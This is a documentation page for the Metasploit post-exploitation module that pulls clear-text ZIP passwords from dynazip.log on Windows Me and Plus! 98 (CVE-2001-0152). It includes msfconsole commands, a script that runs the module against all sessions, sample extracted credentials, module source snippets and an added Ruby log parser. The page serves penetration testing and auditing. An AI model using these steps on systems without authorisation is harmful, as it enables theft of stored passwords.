Windows Gather DynaZIP Saved Password Extraction - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/dynazip_log Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather DynaZIP Saved Password Extraction
Module: post/windows/gather/credentials/dynazip_log
Source code: modules/post/windows/gather/credentials/dynazip_log.rb
Disclosure date: 2001-03-27
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2001-0152

This module extracts clear text credentials from dynazip.log. The log file contains passwords used to encrypt compressed zip files in Microsoft Plus! 98 and Windows Me.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/dynazip_log

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/dynazip_log
msf post(dynazip_log) > show options
    ... show and set options ...
msf post(dynazip_log) > set SESSION session-id
msf post(dynazip_log) > exploit

If you wish to run the post module against all sessions from the framework, here is how:

1 - Create the following resource script (the Ruby code must be wrapped in <ruby> ... </ruby> tags so that msfconsole evaluates it rather than treating each line as a console command):

<ruby>
framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/dynazip_log")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This post-exploitation module extracts clear text credentials from dynazip.log.

The dynazip.log file is located in %WINDIR% and contains log entries generated during encryption of Compressed Folders (zip files) in Microsoft® Plus! 98 and Windows® Me. Each log entry contains detailed diagnostic information generated during the encryption process, including the zip file name and the password used to encrypt the zip file in clear text.

Microsoft released details of the vulnerability in Microsoft Security Bulletin MS01-019, rated Critical. A patch which disabled use of the log file was also released; however, the patch did not clear the contents of an existing log file, so passwords recorded before the patch was applied remain readable on disk.

Microsoft® Plus! 98 and Windows® Me are no longer supported by Microsoft.

Verification Steps


  1. Start msfconsole
  2. Get meterpreter session
  3. Do: use post/windows/gather/credentials/dynazip_log
  4. Do: set SESSION <session id>
  5. Do: run
  6. You should be able to see the extracted credentials in the module output

Example Run


Default Output

  msf post(dynazip_log) > exploit 

  [+] Found DynaZip log file: C:\WINDOWS\dynazip.log
  [+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
  [+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
  [+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
  [+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'

  ZIP Passwords
  =============

  File Path                                   Password
  ---------                                   --------
  C:\WINDOWS\Desktop\earthbound.zip           fuzzy pickles
  C:\WINDOWS\Desktop\private.zip              priv8
  C:\WINDOWS\Desktop\secret.zip               my secret password!
  C:\WINDOWS\Desktop\thepasswordisaspace.zip   

  [*] Post module execution completed

Verbose Output

  msf post(dynazip_log) > set verbose true
  verbose => true
  msf post(dynazip_log) > exploit 

  [+] Found DynaZip log file: C:\WINDOWS\dynazip.log
  [*] Processing log file (6614 bytes)
  [*] Processing log entry for C:\WINDOWS\Desktop\secret.zip
  [+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
  [*] Processing log entry for C:\WINDOWS\Desktop\private.zip
  [+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
  [*] Processing log entry for C:\WINDOWS\Desktop\thepasswordisaspace.zip
  [+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
  [*] Processing log entry for C:\WINDOWS\Desktop\earthbound.zip
  [+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'
  [*] Processing log entry for C:\WINDOWS\Desktop\this file is not encrypted.zip
  [*] Did not find a password

  ZIP Passwords
  =============

  File Path                                   Password
  ---------                                   --------
  C:\WINDOWS\Desktop\earthbound.zip           fuzzy pickles
  C:\WINDOWS\Desktop\private.zip              priv8
  C:\WINDOWS\Desktop\secret.zip               my secret password!
  C:\WINDOWS\Desktop\thepasswordisaspace.zip   

  [*] Post module execution completed

Example Log Entry


An example dynazip.log log file entry is shown below:

  --- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17  17:01:46 ---
  Function:  5 
  lpszZIPFile: 0x00437538 
  C:\WINDOWS\Desktop\secret.zip
  lpszItemList: 0x0059e878 
  "secret.txt"
  lpMajorStatus: 0x00000000 
  lpMajorUserData: 0x00000000 
  lpMinorStatus: 0x00000000 
  lpMinorUserData: 0x00000000 
  dosifyFlag: 0 
  recurseFlag: 0 
  compFactor: 5 
  quietFlag: 1 
  pathForTempFlag: 0 
  lpszTempPath: 0x00000000 
  ???
  fixFlag: 0 
  fixHarderFlag: 0 
  includeVolumeFlag: 0 
  deleteOriginalFlag: 0 
  growExistingFlag: 0 
  noDirectoryNamesFlag: 0 
  convertLFtoCRLFFlag: 0 
  addCommentFlag: 0 
  lpszComment: 0x00000000 
  ???
  afterDateFlag: 0 
  lpszDate: 0x00000000 
  oldAsLatestFlag: 0 
  includeOnlyFollowingFlag: 0 
  lpszIncludeFollowing: 0x00000000 
  ???
  excludeFollowingFlag: 0 
  lpszExludeFollowing: 0x00000000 
  ???
  noDirectoryEntriesFlag: 0 
  includeSysHiddenFlag: 1 
  dontCompressTheseSuffixesFlag: 0 
  lpszStoreSuffixes: 0x00000000 
  ???
  encryptFlag: 1 
  lpszEncryptCode: 0x712185d4 
  my secret password!
  lpMessageDisplay: 0x7120ca22 
  lpMessageDisplayData: 0x00000000 
  wMultiVolControl: 0x0000 
  wZipSubOptions: 0x0000 
  lResv1: 0x00000000 
  lResv2: 0x00000000 
  lpszExtProgTitle: 0x00000000 
  ???
  lpRenameProc: 0x71203919 
  lpRenameUserData: 0x0059eb8a 
  lpMemBlock: 0x004e3a0c 
  lMemBlockSize: 6 
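
As an added example (not the module's own code), the following Ruby parser reads entries in the dynazip.log format shown above and reports which archives have their password recorded in clear text, so a recovered log can be audited before it is securely deleted. It handles the two edge cases visible in the module output: a blank password (empty line, archive not encrypted) and a password consisting of a single space. The sample log is constructed, not a real capture.

```ruby
# Added example, not the module's own code: a parser for dynazip.log entries
# in the format shown above. It reports which ZIP files have their password
# recorded in clear text, so an affected log can be audited before it is
# securely deleted (the MS01-019 patch did not clear existing entries).
DYNAZIP_HEADER = /^--- DynaZIP ZIP Diagnostic Log - Version: /

# Returns one hash per log entry: { path:, encrypted:, password: }.
# The value of lpszZIPFile and lpszEncryptCode is on the line *after* the key.
def parse_dynazip_log(log_data)
  records = []
  log_data.split(DYNAZIP_HEADER).drop(1).each do |entry|
    lines = entry.lines.map(&:chomp)
    rec = { path: nil, encrypted: false, password: nil }
    lines.each_with_index do |line, i|
      value = lines[i + 1] || ''
      case line
      when /\AlpszZIPFile: 0x\h+\s*\z/
        rec[:path] = value.strip
      when /\AencryptFlag: (\d)\s*\z/
        rec[:encrypted] = ($1 == '1')
      when /\AlpszEncryptCode: 0x\h+\s*\z/
        # A blank password leaves an empty line and the ZIP is not encrypted.
        # Do not strip the value: a single-space password is a real password.
        rec[:password] = value.empty? ? nil : value
      end
    end
    records << rec if rec[:path]
  end
  records
end

# [path, password] pairs for every archive whose password is exposed.
def leaked_passwords(log_data)
  parse_dynazip_log(log_data).select { |r| r[:password] }.map { |r| [r[:path], r[:password]] }
end

# Constructed sample (not a real capture), trimmed to the lines the parser reads.
SAMPLE_LOG = [
  '--- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17  17:01:46 ---',
  'lpszZIPFile: 0x00437538 ', 'C:\WINDOWS\Desktop\secret.zip',
  'encryptFlag: 1 ', 'lpszEncryptCode: 0x712185d4 ', 'my secret password!',
  '--- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17  17:02:10 ---',
  'lpszZIPFile: 0x00437538 ', 'C:\WINDOWS\Desktop\thepasswordisaspace.zip',
  'encryptFlag: 1 ', 'lpszEncryptCode: 0x712185d4 ', ' ',
  '--- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17  17:03:33 ---',
  'lpszZIPFile: 0x00437538 ', 'C:\WINDOWS\Desktop\this file is not encrypted.zip',
  'encryptFlag: 0 ', 'lpszEncryptCode: 0x00000000 ', ''
].join("\n") + "\n"

leaked_passwords(SAMPLE_LOG).each { |path, pw| puts "#{path} -> '#{pw}'" }
```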


Msfconsole Usage


Here is how the windows/gather/credentials/dynazip_log post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/dynazip_log

msf6 post(windows/gather/credentials/dynazip_log) > show info

       Name: Windows Gather DynaZIP Saved Password Extraction
     Module: post/windows/gather/credentials/dynazip_log
   Platform: Windows
       Arch: 
       Rank: Normal
  Disclosed: 2001-03-27

Provided by:
  bcoles <[email protected]>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts clear text credentials from dynazip.log. The 
  log file contains passwords used to encrypt compressed zip files in 
  Microsoft Plus! 98 and Windows Me.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2001-0152
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/MS01-019
  https://packetstormsecurity.com/files/24543
  https://support.microsoft.com/en-us/kb/265131

Module Options


This is a complete list of options available in the windows/gather/credentials/dynazip_log post exploitation module:

msf6 post(windows/gather/credentials/dynazip_log) > show options

Module options (post/windows/gather/credentials/dynazip_log):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/dynazip_log post exploitation module:

msf6 post(windows/gather/credentials/dynazip_log) > show advanced

Module advanced options (post/windows/gather/credentials/dynazip_log):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/dynazip_log module can do:

msf6 post(windows/gather/credentials/dynazip_log) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/dynazip_log post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/dynazip_log) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help identify the root cause of the problem.

<LOG_PATH> not found


Here is a relevant code snippet related to the "<LOG_PATH> not found" error message:

    creds = []

    log_path = "#{get_env("%WINDIR%")}\\dynazip.log"

    unless file?(log_path)
      print_error("#{log_path} not found")
      return
    end

    print_good("Found DynaZip log file: #{log_path}")

Log file is empty


Here is a relevant code snippet related to the "Log file is empty" error message:

    print_good("Found DynaZip log file: #{log_path}")

    begin
      log_data = read_file(log_path)
    rescue EOFError
      print_error('Log file is empty')
      return
    end

    vprint_status("Processing log file (#{log_data.length} bytes)")

Did not find a password


Here is a relevant code snippet related to the "Did not find a password" error message:

      # In the event that the user selected a blank encryption password
      # the ZIP file is not encrypted, however an empty line is written
      # to the log file.
      if passwd.to_s.eql?('')
        vprint_status('Did not find a password')
        next
      end

      print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
      creds << [zip_path, passwd]

No passwords were found in the log file


Here is a relevant code snippet related to the "No passwords were found in the log file" error message:

      print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
      creds << [zip_path, passwd]
    end

    if creds.empty?
      print_error('No passwords were found in the log file')
      return
    end

    table = Rex::Text::Table.new(
      'Header'    => 'ZIP Passwords',

Authors


  • bcoles

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
